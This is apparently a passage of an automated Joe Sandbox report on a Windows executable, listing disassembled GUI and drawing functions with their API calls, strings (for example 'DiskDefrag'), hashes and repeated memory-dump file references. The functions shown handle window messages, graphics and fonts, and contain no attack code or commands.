                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: PerformanceQuery$Counter$AddressFrequencyHandleModuleProcUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                                • String ID: NtQuerySystemInformation$ntdll
                                                                                                                                                                                                                                                                                                • API String ID: 3025674679-3593917365
                                                                                                                                                                                                                                                                                                • Opcode ID: 3125494ca8bbf67271106e3f1c2de1996966a1ae5acd7d052624fdc1ffea64cd
                                                                                                                                                                                                                                                                                                • Instruction ID: d06557f50192d5db3270ba6b6212bac26de826900838c4c68c4281c4e513f8d9
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3125494ca8bbf67271106e3f1c2de1996966a1ae5acd7d052624fdc1ffea64cd
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AF518F71B1C301ABD7149F11FD55AAA37E4FB98780F108C3EE585A2268FB3499418BDD
                                                                                                                                                                                                                                                                                                Function 0042CAA0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 142windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0042CAB6
                                                                                                                                                                                                                                                                                                • IsWindowVisible.USER32(?), ref: 0042CAE7
                                                                                                                                                                                                                                                                                                • GetParent.USER32(?), ref: 0042CB0D
                                                                                                                                                                                                                                                                                                • SendNotifyMessageW.USER32(?,000083FF,00000000,00000000), ref: 0042CB22
                                                                                                                                                                                                                                                                                                • IsWindowVisible.USER32(?), ref: 0042CB35
                                                                                                                                                                                                                                                                                                • GetParent.USER32(?), ref: 0042CB43
                                                                                                                                                                                                                                                                                                • SendNotifyMessageW.USER32(?,000083FF,00000000,00000000), ref: 0042CB58
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend$NotifyParentVisibleWindow
                                                                                                                                                                                                                                                                                                • String ID: `=
                                                                                                                                                                                                                                                                                                • API String ID: 2910063261-2762138152
                                                                                                                                                                                                                                                                                                • Opcode ID: a16c229816da6b7cf5f0a28e1e2d3aecd927b3af40c0253dbdebf6034a51f9bf
                                                                                                                                                                                                                                                                                                • Instruction ID: cbd818397c052fadd252f380dd8efe1df66f27c17fa2dba641e1c387511c7e9b
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a16c229816da6b7cf5f0a28e1e2d3aecd927b3af40c0253dbdebf6034a51f9bf
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B0511030764700ABE224EF31DDD6FEA7394BB50B04F90842EB25F9A1D19FA47944CB99
                                                                                                                                                                                                                                                                                                Function 00402760 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 122windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000172,00000000,?), ref: 004027B1
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000172,00000000,?), ref: 00402863
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                                                • String ID: 3402041$3402042$DiskDefrag$Images$close$open
                                                                                                                                                                                                                                                                                                • API String ID: 3850602802-3786962624
                                                                                                                                                                                                                                                                                                • Opcode ID: cdc453c516630b020ec0cec2833834f757ecf7b414e406f0a32de656b7e70e72
                                                                                                                                                                                                                                                                                                • Instruction ID: 8150cbd10707325bb4a07bc8764e9056bc1ba0aa629cfab9f1adae748ae802a6
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cdc453c516630b020ec0cec2833834f757ecf7b414e406f0a32de656b7e70e72
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F8319EB579020027D61576254EA6FBE21661FC4B48F25C22FB30E7B3C2DEED9C41429E
                                                                                                                                                                                                                                                                                                Function 004275D0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 75windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ActiveMessageWindow
                                                                                                                                                                                                                                                                                                • String ID: 3400001$3400101$3401090$rY
                                                                                                                                                                                                                                                                                                • API String ID: 3610105657-3605576623
                                                                                                                                                                                                                                                                                                • Opcode ID: b7d0b320c8ac4bba339029e9d88ce301a028bf10c8a73a5048825e82f1bb1e34
                                                                                                                                                                                                                                                                                                • Instruction ID: 7aa1b3021184ad304fb6d47c852e9f0d985907e1382866191d812cb31a89d144
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b7d0b320c8ac4bba339029e9d88ce301a028bf10c8a73a5048825e82f1bb1e34
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 872179F0A50301BBD7106BB49C4AB9A31A8AF54701F50C82BB50EE1550D7BCA8449B6D
                                                                                                                                                                                                                                                                                                Function 00416B80 Relevance: 13.6, APIs: 9, Instructions: 118windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00416BBB
                                                                                                                                                                                                                                                                                                • GetCursorPos.USER32(?), ref: 00416BCF
                                                                                                                                                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 00416BDE
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000198,00000000,?), ref: 00416BFF
                                                                                                                                                                                                                                                                                                • PtInRect.USER32(?,?,?), ref: 00416C10
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000198,?,?), ref: 00416C74
                                                                                                                                                                                                                                                                                                • InvalidateRect.USER32(?,?,00000001), ref: 00416C87
                                                                                                                                                                                                                                                                                                • PtInRect.USER32(?,?,?), ref: 00416C98
                                                                                                                                                                                                                                                                                                • InvalidateRect.USER32(?), ref: 00416CC7
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Rect$MessageSend$Invalidate$ClientCursorScreen
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2454936240-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 41846961993d4e238d2a253bad1eeefc775d047419a5e1f45b38c98fcc342d77
                                                                                                                                                                                                                                                                                                • Instruction ID: e3b87b86549111153a689a6de42a5e443b1792048b086b4c3e38e8d95830a062
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 41846961993d4e238d2a253bad1eeefc775d047419a5e1f45b38c98fcc342d77
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B3413BB1208301AFC310DF65D884EABB7E9FBC8710F004A2EF59987250E775E945CBA6
                                                                                                                                                                                                                                                                                                Function 004318A0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 294windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • CopyRect.USER32(?,?), ref: 004318DA
                                                                                                                                                                                                                                                                                                • FrameRect.USER32(?,?,00000000), ref: 004319AA
                                                                                                                                                                                                                                                                                                • CreateCompatibleDC.GDI32(?), ref: 00431B90
                                                                                                                                                                                                                                                                                                • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00431BCE
                                                                                                                                                                                                                                                                                                • SelectObject.GDI32(?,?), ref: 00431BEF
                                                                                                                                                                                                                                                                                                • AlphaBlend.MSIMG32(?,?,?,?,00000003,?,00000000,00000000,?,00000003,00000000,00000000,00000000,?,?,00F0F0F0), ref: 00431C5D
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CompatibleCreateRect$AlphaBitmapBlendCopyFrameObjectSelect
                                                                                                                                                                                                                                                                                                • String ID: Z
                                                                                                                                                                                                                                                                                                • API String ID: 54210234-1505515367
                                                                                                                                                                                                                                                                                                • Opcode ID: 5f029b77f6b4eb3bbc3495fe3d68357bdf896ac53e414383373f8e8c30d0e72a
                                                                                                                                                                                                                                                                                                • Instruction ID: 0792d4e533d00b1b26a73fc7749f663e28f4755597dc11c0d4e9561af80c2fe6
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5f029b77f6b4eb3bbc3495fe3d68357bdf896ac53e414383373f8e8c30d0e72a
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3DC112716083418FC724DF69C984A5BBBE5AFC8704F108A2EF58987391DB74E909CB96
                                                                                                                                                                                                                                                                                                Function 00410D00 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 242COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: 3401059$3401060$3401061$3401062$<a>%s</a>
                                                                                                                                                                                                                                                                                                • API String ID: 0-135031447
                                                                                                                                                                                                                                                                                                • Opcode ID: 1d18fe7b7d33c6ca33f908e1a40e0b7338c7c8696b9367286f1202db6d62bc10
                                                                                                                                                                                                                                                                                                • Instruction ID: 570f8eb3785bc855bef0c474daa2501289258084391a13b0a6423d05570a55ca
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1d18fe7b7d33c6ca33f908e1a40e0b7338c7c8696b9367286f1202db6d62bc10
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3D81D7717543005BC714EF218C42BDA33A4AF88714F14853FBA0D6B2C6DBB9E985879E
                                                                                                                                                                                                                                                                                                Function 004653B0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 182COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004012D0: EnterCriticalSection.KERNEL32 ref: 00401305
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004012D0: LeaveCriticalSection.KERNEL32(00497DC0), ref: 00401316
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004650D0: GetDC.USER32(00000000), ref: 004650D8
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004650D0: GetDeviceCaps.GDI32(00000000,00000008), ref: 004650E9
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004650D0: GetDeviceCaps.GDI32(00000000,0000000A), ref: 004650F0
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004650D0: GetDeviceCaps.GDI32(00000000,00000058), ref: 004650F9
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004650D0: GetDeviceCaps.GDI32(00000000,0000005A), ref: 00465108
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004650D0: ReleaseDC.USER32(00000000,00000000), ref: 0046512C
                                                                                                                                                                                                                                                                                                • GetSysColor.USER32(0000000F), ref: 00465580
                                                                                                                                                                                                                                                                                                • SetRect.USER32 ref: 004655DE
                                                                                                                                                                                                                                                                                                • SetRect.USER32(?,00000005,00000000,00000005,00000000), ref: 004655ED
                                                                                                                                                                                                                                                                                                • CreateFontW.GDI32(0000000E,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,Arial), ref: 00465611
                                                                                                                                                                                                                                                                                                • GdiplusStartup.GDIPLUS(?,?,?,00000000,?,?,?,?,?,?,00000005,00000000,00000005,00000000,?,00000000), ref: 00465655
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
